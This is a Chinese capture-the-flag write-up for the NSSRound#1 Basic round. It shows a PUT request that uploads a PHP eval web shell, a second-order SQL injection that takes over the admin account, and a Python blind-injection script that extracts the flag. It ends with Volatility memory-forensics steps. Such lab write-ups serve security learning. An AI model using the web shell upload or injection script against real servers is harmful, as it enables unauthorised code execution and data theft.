NSSRound#1 Basic
2022-08-03 23:37:08

# WEB

# basic_check

发现允许 PUT 方法请求

image-20230604010937329

1
2
3
4
5
6
7
8
9
10
11
12
PUT /shell.php HTTP/1.1
Host: 1.14.71.254:28848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

<?php eval($_POST[1]);?>

写入一句话
rce 即可

# Basic]sql_by_sql

先注册,进去有个修改密码
可能是二次注入

修改密码处源码

1
<!-- update user set password='%s' where username='%s'; -->

重新注册一个 admin--+
获得 admin 身份

image-20230604011013788

/query 下查询

image-20230604011022834

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2022/8/3 21:42
# @Author : ki10Moc
# @FileName: [NSSRound#1 Basic]sql_by_sql.py
# @Software: PyCharm
# Link: ki10.top


import requests
import string

str = string.ascii_letters + string.digits

url = "http://1.14.71.254:28697/query"
s = requests.session()
headers = {'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.YklOVg.Pz554uNEiaxxBCpP4pm7-G8iucg'}

if __name__ == "__main__":
name = ''
for i in range(0,100):
char = ''
for j in str:
#表+字段
#payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
#数据
payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
data = {"id": payload}
r = s.post(url=url, data=data, headers=headers)
#print(r.text)
if "exist" in r.text:
name += j
print (j, end='')
char = j
break
if char == '%':
break

# MISC

# cut_into_thirds

1
python vol.py -f ./cut_into_thirds.raw imageinfo

得到版本号

image-20230604011043989

1
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist

image-20230604011056088

这有个引人注意的进程

获取 dump 文件

1
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 memdump -p 1164 -D ./ 

foremost 分离得到 part1

1
part1:3930653363343839PK?

直接 dump 目标文件

1
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 procdump -p 1164 -D ./ 

并查找相关信息

1
strings ./executable.1164.exe 

得到 part2

1
part2:GRRGGYJNGQ4GKMBNMJRTONI=

最后查看用户信息得到 part3

image-20230604011108142

分别进行 base16、32、64 解密即可